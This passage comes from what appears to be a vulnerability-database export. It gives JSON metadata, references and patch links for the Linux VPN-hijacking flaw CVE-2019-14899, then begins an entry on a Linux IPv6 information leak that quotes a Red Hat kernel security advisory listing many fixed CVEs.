        "id": "CVE-2019-14899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "db": "PACKETSTORM",
        "id": "160061"
      },
      {
        "db": "PACKETSTORM",
        "id": "158457"
      },
      {
        "db": "PACKETSTORM",
        "id": "160545"
      },
      {
        "db": "PACKETSTORM",
        "id": "158456"
      },
      {
        "db": "PACKETSTORM",
        "id": "158458"
      }
    ],
    "trust": 2.25
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-146891",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-14899",
        "trust": 3.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/05/1",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2020/08/13/2",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2020/10/07/3",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "158458",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "160061",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "160545",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4060.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2431",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3181.2",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "158457",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "158456",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-146891",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-14899",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "PACKETSTORM",
        "id": "160061"
      },
      {
        "db": "PACKETSTORM",
        "id": "158457"
      },
      {
        "db": "PACKETSTORM",
        "id": "160545"
      },
      {
        "db": "PACKETSTORM",
        "id": "158456"
      },
      {
        "db": "PACKETSTORM",
        "id": "158458"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ]
  },
  "id": "VAR-201912-0930",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:01:45.732000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.apple.com/"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.freebsd.org/"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.openbsd.org/"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2019/12/06/vpnbusting_bug_spotted/"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerability in Ubuntu affects IBM Workload Scheduler 9.5",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c1924c17776c7639f1ecf5990d32dd51"
      },
      {
        "title": "namespaced-openvpn",
        "trust": 0.1,
        "url": "https://github.com/slingamn/namespaced-openvpn "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/kicksecure/security-misc "
      },
      {
        "title": "security-misc",
        "trust": 0.1,
        "url": "https://github.com/whonix/security-misc "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/developer3000s/poc-in-github "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/hectorgie/poc-in-github "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/linux-bug-vpns-hijacking/150891/"
      },
      {
        "title": "BleepingComputer",
        "trust": 0.1,
        "url": "https://www.bleepingcomputer.com/news/security/new-linux-vulnerability-lets-attackers-hijack-vpn-connections/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-300",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14899"
      },
      {
        "trust": 2.4,
        "url": "https://support.apple.com/kb/ht211288"
      },
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14899"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2020/jul/23"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2020/jul/24"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2020/jul/25"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2020/nov/20"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2020/dec/32"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2020/08/13/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2020/10/07/3"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2021/07/05/1"
      },
      {
        "trust": 1.8,
        "url": "https://openvpn.net/security-advisory/no-flaws-found-in-openvpn-software/"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht211289"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht211290"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht211850"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht211931"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14899"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160545/apple-security-advisory-2020-12-14-4.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160061/apple-security-advisory-2020-11-13-3.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/systemd-rc-d-information-disclosure-via-vpn-tunneled-tcp-connections-31089"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3181.2/"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht211850"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4060.2/"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht211931"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ubuntu-affects-ibm-workload-scheduler-9-5-2/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/158458/apple-security-advisory-2020-07-15-3.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2431/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9918"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9889"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9888"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9891"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9890"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9865"
      },
      {
        "trust": 0.2,
        "url": "https://www.apple.com/itunes/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13631"
      },
      {
        "trust": 0.2,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13630"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9878"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9934"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9885"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9936"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9915"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9925"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9894"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9909"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9916"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9933"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9910"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9914"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9895"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9893"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9862"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9907"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/300.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/slingamn/namespaced-openvpn"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111104"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9961"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9964"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9951"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-6147"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9947"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9963"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9944"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9954"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9773"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9941"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9943"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9958"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9965"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht211850."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9946"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9876"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13520"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9949"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9849"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9950"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9959"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9952"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9799"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9913"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9864"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9866"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9884"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9870"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20807"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10014"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10016"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10011"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27894"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27896"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht211931."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10003"
      },
      {
        "trust": 0.1,
        "url": "https://www.knownsec.com/)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10009"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10004"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10002"
      },
      {
        "trust": 0.1,
        "url": "https://www.paloaltonetworks.com/)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10010"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10012"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10663"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10006"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10007"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9903"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9931"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9917"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9911"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "PACKETSTORM",
        "id": "160061"
      },
      {
        "db": "PACKETSTORM",
        "id": "158457"
      },
      {
        "db": "PACKETSTORM",
        "id": "160545"
      },
      {
        "db": "PACKETSTORM",
        "id": "158456"
      },
      {
        "db": "PACKETSTORM",
        "id": "158458"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "PACKETSTORM",
        "id": "160061"
      },
      {
        "db": "PACKETSTORM",
        "id": "158457"
      },
      {
        "db": "PACKETSTORM",
        "id": "160545"
      },
      {
        "db": "PACKETSTORM",
        "id": "158456"
      },
      {
        "db": "PACKETSTORM",
        "id": "158458"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-12-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "date": "2019-12-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "date": "2019-12-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "date": "2020-11-13T20:32:22",
        "db": "PACKETSTORM",
        "id": "160061"
      },
      {
        "date": "2020-07-17T19:23:49",
        "db": "PACKETSTORM",
        "id": "158457"
      },
      {
        "date": "2020-12-16T18:05:29",
        "db": "PACKETSTORM",
        "id": "160545"
      },
      {
        "date": "2020-07-17T19:23:30",
        "db": "PACKETSTORM",
        "id": "158456"
      },
      {
        "date": "2020-07-17T19:24:07",
        "db": "PACKETSTORM",
        "id": "158458"
      },
      {
        "date": "2019-12-11T15:15:14.263000",
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "date": "2019-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-03-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "date": "2021-07-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "date": "2019-12-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "date": "2023-03-01T16:40:04.140000",
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "date": "2023-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Vulnerabilities in multiple products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ],
    "trust": 0.6
  }
}

var-202112-2255
Vulnerability from variot

In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. Linux Kernel Exists in the use of cryptographic algorithms.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2022:1988-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:1988 Issue date: 2022-05-10 CVE Names: CVE-2020-0404 CVE-2020-4788 CVE-2020-13974 CVE-2020-27820 CVE-2021-0941 CVE-2021-3612 CVE-2021-3669 CVE-2021-3743 CVE-2021-3744 CVE-2021-3752 CVE-2021-3759 CVE-2021-3764 CVE-2021-3772 CVE-2021-3773 CVE-2021-4002 CVE-2021-4037 CVE-2021-4083 CVE-2021-4157 CVE-2021-4197 CVE-2021-4203 CVE-2021-20322 CVE-2021-21781 CVE-2021-26401 CVE-2021-29154 CVE-2021-37159 CVE-2021-41864 CVE-2021-42739 CVE-2021-43056 CVE-2021-43389 CVE-2021-43976 CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 CVE-2022-0322 CVE-2022-1011 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64 Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

Security Fix(es):

  • kernel: fget: check that the fd still exists after getting a ref to it (CVE-2021-4083)

  • kernel: avoid cyclic entity chains due to malformed USB descriptors (CVE-2020-0404)

  • kernel: speculation on incompletely validated data on IBM Power9 (CVE-2020-4788)

  • kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c (CVE-2020-13974)

  • kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free (CVE-2021-0941)

  • kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() (CVE-2021-3612)

  • kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts (CVE-2021-3669)

  • kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c (CVE-2021-3743)

  • kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() (CVE-2021-3744)

  • kernel: possible use-after-free in bluetooth module (CVE-2021-3752)

  • kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks (CVE-2021-3759)

  • kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)

  • kernel: sctp: Invalid chunks may be used to remotely remove existing associations (CVE-2021-3772)

  • kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients (CVE-2021-3773)

  • kernel: possible leak or coruption of data residing on hugetlbfs (CVE-2021-4002)

  • kernel: security regression for CVE-2018-13405 (CVE-2021-4037)

  • kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)

  • kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)

  • kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)

  • kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies (CVE-2021-20322)

  • kernel: arm: SIGPAGE information disclosure vulnerability (CVE-2021-21781)

  • hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)

  • kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation (CVE-2021-29154)

  • kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c (CVE-2021-37159)

  • kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write (CVE-2021-41864)

  • kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)

  • kernel: ppc: kvm: allows a malicious KVM guest to crash the host (CVE-2021-43056)

  • kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c (CVE-2021-43389)

  • kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device (CVE-2021-43976)

  • kernel: use-after-free in the TEE subsystem (CVE-2021-44733)

  • kernel: information leak in the IPv6 implementation (CVE-2021-45485)

  • kernel: information leak in the IPv4 implementation (CVE-2021-45486)

  • hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)

  • hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)

  • kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)

  • kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c (CVE-2022-0322)

  • kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes (CVE-2022-1011)

  • kernel: use-after-free in nouveau kernel module (CVE-2020-27820)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.6 Release Notes linked from the References section.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1888433 - CVE-2020-4788 kernel: speculation on incompletely validated data on IBM Power9 1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module 1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors 1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation 1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver 1957375 - [RFE] x86, tsc: Add kcmdline args for skipping tsc calibration sequences 1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() 1981950 - CVE-2021-21781 kernel: arm: SIGPAGE information disclosure vulnerability 1983894 - Hostnetwork pod to service backed by hostnetwork on the same node is not working with OVN Kubernetes 1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c 1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts 1994390 - FIPS: deadlock between PID 1 and "modprobe crypto-jitterentropy_rng" at boot, preventing system to boot 1997338 - block: update to upstream v5.14 1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function 1997961 - CVE-2021-3743 kernel: 